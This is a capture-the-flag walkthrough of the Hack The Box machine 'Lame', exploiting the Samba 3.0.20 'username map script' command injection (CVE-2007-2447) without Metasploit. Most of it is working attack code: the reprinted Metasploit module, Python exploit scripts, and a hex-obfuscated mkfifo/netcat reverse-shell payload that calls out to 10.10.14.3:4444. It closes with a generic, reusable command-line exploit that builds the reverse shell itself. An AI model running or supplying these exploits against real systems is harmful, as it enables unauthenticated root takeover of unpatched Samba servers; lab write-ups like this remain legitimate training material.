# Hack The Box - Lame Walkthrough without Metasploit

![Lame](/files/-MP3Prl19B6uqttXsoUL)

## Enumeration

We start by running nmap against the target, with default scripts and version detection:

```bash
nmap -sC -sV 10.10.10.3
```

![Lame enumeration](/files/-MP3V6j1c8KaXs3XQys7)

FTP is open and nmap reports that anonymous login is allowed, so we log in and look for anything useful:

![Empty ftp ](/files/-MP3d753ibO0_nnD5uvW)

We found nothing there. The next interesting thing in the initial enumeration is Samba, running as version 3.0.20-Debian on ports 139 and 445. A quick search shows that this version is vulnerable to unauthenticated remote command execution through the `username map script` option (CVE-2007-2447), not a memory-corruption bug: <https://www.exploit-db.com/exploits/16320>

```ruby
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SMB

	# For our customized version of session_setup_ntlmv1
	CONST = Rex::Proto::SMB::Constants
	CRYPT = Rex::Proto::SMB::Crypt

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba "username map script" Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulnerability in Samba
				versions 3.0.20 through 3.0.25rc3 when using the non-default
				"username map script" configuration option. By specifying a username
				containing shell meta characters, attackers can execute arbitrary
				commands.

				No authentication is needed to exploit this vulnerability since
				this option is used to map usernames prior to authentication!
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10040 $',
			'References'     =>
				[
					[ 'CVE', '2007-2447' ],
					[ 'OSVDB', '34700' ],
					[ 'BID', '23972' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
					[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => true, # root or nobody user
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							# *_perl and *_ruby work if they are installed
							# mileage may vary from system to system..
						}
				},
			'Targets'        =>
				[
					[ "Automatic", { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 14 2007'))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end


	def exploit

		connect

		# lol?
		username = "/=`nohup " + payload.encoded + "`"
		begin
			simple.client.negotiate(false)
			simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
		rescue ::Timeout::Error, XCEPT::LoginError
			# nothing, it either worked or it didn't ;)
		end

		handler
	end

end
```

But that is a Metasploit module and we want to do this without it. Reading the module tells us everything we need: the bug is triggered by **specifying a username containing shell metacharacters**, which the `username map script` hands to a shell, and **no authentication is needed** because the mapping runs before the credentials are checked. The module itself does nothing more than send an SMB session setup with the username ``/=`nohup <command>` `` and ignore the resulting login error. With that, we can write our own Python script against this Samba version.

## Exploitation

### Creating the script

This is the skeleton of the Python script we will use to exploit this Samba version. The username is the only thing that matters: whatever sits between the backticks is executed by the shell that runs the `username map script`, as root or nobody, before any password is checked.

```python
#!/usr/bin/python3
# Samba 3.0.20-Debian - CVE-2007-2447 "username map script" command injection
from smb.SMBConnection import SMBConnection

# Generated with:
# msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
payload = ""

# The username reaches /bin/sh unsanitised, so the backticks execute the payload;
# nohup keeps it running after smbd drops the session
userID = "/=` nohup " + payload + "`"
password = 'evil'   # any value works: the command runs before authentication
ip = '10.10.10.3'

conn = SMBConnection(userID, password, "some", "thing", use_ntlm_v2=False)
conn.connect(ip, 445)
```

### Creating the Payload

For the payload we will use **msfvenom** to create a reverse shell that we will capture with netcat:

```bash
msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
```

### Putting everything together

```python
#!/usr/bin/python3
# Samba 3.0.20-Debian - CVE-2007-2447 "username map script" command injection
from smb.SMBConnection import SMBConnection

# Generated with:
# msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
# The hex below decodes to:
# mkfifo /tmp/jzjclng; nc 10.10.14.3 4444 0</tmp/jzjclng | /bin/sh >/tmp/jzjclng 2>&1; rm /tmp/jzjclng
payload = ("\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a"
           "\x7a\x6a\x63\x6c\x6e\x67\x3b\x20\x6e\x63\x20\x31\x30"
           "\x2e\x31\x30\x2e\x31\x34\x2e\x33\x20\x34\x34\x34\x34"
           "\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c"
           "\x6e\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
           "\x3e\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67"
           "\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d"
           "\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67")

# The username reaches /bin/sh unsanitised, so the backticks execute the payload;
# nohup keeps it running after smbd drops the session
userID = "/=` nohup " + payload + "`"
password = 'evil'   # any value works: the command runs before authentication
ip = '10.10.10.3'

conn = SMBConnection(userID, password, "some", "thing", use_ntlm_v2=False)
conn.connect(ip, 445)
```

Now we start a listener in another terminal, on the port baked into the payload (4444 here):

```bash
nc -nvlp 4444
```

![Netcat Listener](/files/-MP3eMoirPxoVLzOplgw)

We might run into an error while executing the script

![Error running the script](/files/-MP3bewm8BO573ZtOAWz)

The script depends on the `pysmb` module; if it is missing, install it with:

```bash
pip3 install pysmb
```

Now we can run it again and, with the listener ready, we should get a shell back.
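As an added example, not the walkthrough's own script, the same exploit can be written so that it builds the reverse-shell command itself instead of pasting msfvenom's hex output, and can be dry-run to inspect the injected username before anything is sent over the wire. The CLI flags, function names and `--dry-run` mode are my assumptions; the injection format ``/=`nohup ...` `` is the one the Metasploit module uses, and `pysmb` is imported only when actually firing, so the dry run works without it installed.

```python
#!/usr/bin/env python3
"""CVE-2007-2447 (Samba 3.0.20 - 3.0.25rc3 "username map script") exploit
without Metasploit and without msfvenom: the reverse-shell command is built
here, wrapped in the same "/=`nohup ...`" username the Metasploit module
uses, and sent as the SMB session-setup username.

Added example; flag names, function names and the dry-run mode are
assumptions, not part of the original walkthrough."""
import argparse
import random
import string


def reverse_shell_cmd(lhost, lport, fifo=None):
    """Same mkfifo/netcat shell that msfvenom's cmd/unix/reverse_netcat emits.
    Works with the classic nc on the target, which has no -e option."""
    if fifo is None:
        fifo = "/tmp/" + "".join(random.choices(string.ascii_lowercase, k=7))
    return f"mkfifo {fifo}; nc {lhost} {lport} 0<{fifo} | /bin/sh >{fifo} 2>&1; rm {fifo}"


def inject_username(cmd):
    """Wrap cmd so the shell running the username map script evaluates it.
    Samba 3.0.20 passes the username to that shell unsanitised, so the
    backticks run cmd; nohup keeps it alive after smbd drops the session."""
    if "`" in cmd:
        raise ValueError("payload cannot contain backticks: it already sits inside `...`")
    return "/=`nohup " + cmd + "`"


def fire(rhost, rport, username, password="evil"):
    """Send the crafted username in an NTLMv1 session setup.
    pysmb is imported here so --dry-run runs without it installed."""
    from smb.SMBConnection import SMBConnection

    conn = SMBConnection(username, password, "attacker", "target", use_ntlm_v2=False)
    try:
        # The login itself is expected to fail; the command has already run
        # (or not) by the time the server answers.
        conn.connect(rhost, rport)
    except Exception:
        pass
    finally:
        conn.close()


def main():
    ap = argparse.ArgumentParser(description="Samba username map script RCE (CVE-2007-2447)")
    ap.add_argument("--rhost", required=True, help="target, e.g. 10.10.10.3")
    ap.add_argument("--rport", type=int, default=445, help="139 or 445")
    ap.add_argument("--lhost", required=True, help="listener IP (nc -nvlp <lport>)")
    ap.add_argument("--lport", type=int, default=4444)
    ap.add_argument("--dry-run", action="store_true", help="print the username, send nothing")
    args = ap.parse_args()

    username = inject_username(reverse_shell_cmd(args.lhost, args.lport))
    print(f"[*] username: {username}")
    if not args.dry_run:
        fire(args.rhost, args.rport, username)
        print("[*] sent; check your listener")


if __name__ == "__main__":
    main()
```

Run it with `--dry-run` first to see the exact username that will be sent; `--rport 139` matches the Metasploit module's default, while `445` is what the script above uses. The backtick check in `inject_username` matters because a payload containing its own backticks would terminate the outer substitution early and break the injection.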

## Pwnd

We got a shell back. The first thing to do is make it interactive; for that we check whether the machine has Python:

```bash
which python
```

In this case that is enough: we can spawn an interactive TTY with the following command

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
```

![](/files/-MP3fWphp3HtU9tuegqS)

Now we can grab our flag ;)
